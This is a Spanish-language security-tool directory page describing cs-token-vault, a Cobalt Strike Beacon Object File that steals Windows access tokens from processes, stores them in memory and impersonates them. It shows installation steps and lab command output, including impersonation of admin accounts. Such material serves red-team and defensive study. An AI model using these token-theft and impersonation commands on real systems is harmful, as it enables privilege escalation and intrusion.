Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cs-token-vault — Bóveda de tokens en memoria BOF para Cobalt Strike | Kitploit
Herramientas/GitHubGitHub/henkru/cs-token-vault
Autenticación y AutorizaciónFrameworks de Pruebas de PenetraciónEscalada de PrivilegiosPost-ExplotaciónRed Teaming
GitHubhenkru/cs-token-vault

cs-token-vault

Bóveda de tokens en memoria BOF para Cobalt Strike

Ver Repositorio
151268hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Token Vault BOF para Cobalt Strike

Este Beacon Object File (BOF) crea almacenamiento en memoria para tokens de acceso de Windows robados/duplicados, lo que te permite:

  • Intercambiar/reutilizar tokens ya robados sin volver a duplicarlos.
  • Almacenar tokens para usarlos más tarde en caso de cierre de sesión de una persona.

Instalación

  1. Descarga la última versión build o compílala con make all.
  2. Carga el script de aggressor token-vault.cna en tu cliente de Cobalt Strike.

Uso

root@kitploit:~
beacon> help token-vault
Available Commands:
    Create a new token vault:    token-vault create
    Steal and store tokens:      token-vault steal <comma separated list of PIDs> [vault-id]
    Use the stored token:        token-vault use <token-id> [vault-id]
    Show the stored tokens:      token-vault show [vault-id]
    Remove the stored token:     token-vault remove <token-id> [vault-id]
    Remove all tokens:           token-vault remove-all [vault-id]
    Set the default token vault: token-vault set <vault-id>

Creación del vault

El comando token-vault create asigna un vault vacío desde el heap del beacon. El resultado recibido contiene la dirección de memoria del vault (también conocido como vault id), que se utiliza para especificar el vault para los demás comandos de token-vault.

root@kitploit:~
beacon> token-vault create
[*] Token Vault - create (@henkru)
[+] host called home, sent: 2991 bytes
[+] received output:
token vault created: 0000000000C31610

Además, se puede establecer un vault id específico como vault predeterminado, que se utiliza si un comando token-vault no incluye el vault id.

root@kitploit:~
beacon> token-vault set 0000000000C31610

Es importante tener en cuenta que los vaults predeterminados configurados residen dentro del cliente de Cobalt Strike y no se comparten entre clientes.

Robar token

El comando token-vault steal duplica los tokens de los procesos indicados y los almacena en el vault.

root@kitploit:~
beacon> token-vault steal 6600,2608,5248
[*] Token Vault - steal (@henkru)
[+] host called home, sent: 3009 bytes
[+] received output:
6600: WINLAB\limited
[+] received output:
2608: WINLAB\limited2
[+] received output:
5248: WINLAB\admin

Mostrar tokens almacenados

root@kitploit:~
beacon> token-vault show
[*] Token Vault - show (@henkru)
[+] host called home, sent: 2999 bytes
[+] received output:
5248: WINLAB\admin
2608: WINLAB\limited2
6600: WINLAB\limited

Usar token

El comando token-vault use suplanta a un token del vault. Si el token no existe, será robado y almacenado en el vault.

root@kitploit:~
beacon> token-vault use 2608
[*] Token Vault - use (@henkru)
[+] host called home, sent: 3001 bytes
[+] Impersonated WINLAB\limited
root@kitploit:~
beacon> token-vault use 6384
[*] Token Vault - use (@henkru)
[+] host called home, sent: 3001 bytes
[-] token of 6384 not in the vault; try to get it.
[+] received output:
6384: WINLAB\da
[+] Impersonated WINLAB\da

Eliminar token

El comando token-vault remove elimina un token almacenado del vault.

root@kitploit:~
beacon> token-vault remove 6600
[*] Token Vault - remove (@henkru)
[+] host called home, sent: 3001 bytes
[+] received output:
removed: 6600

Además, el comando token-vault remove-all elimina todos los tokens de una sola vez.

Descargar herramienta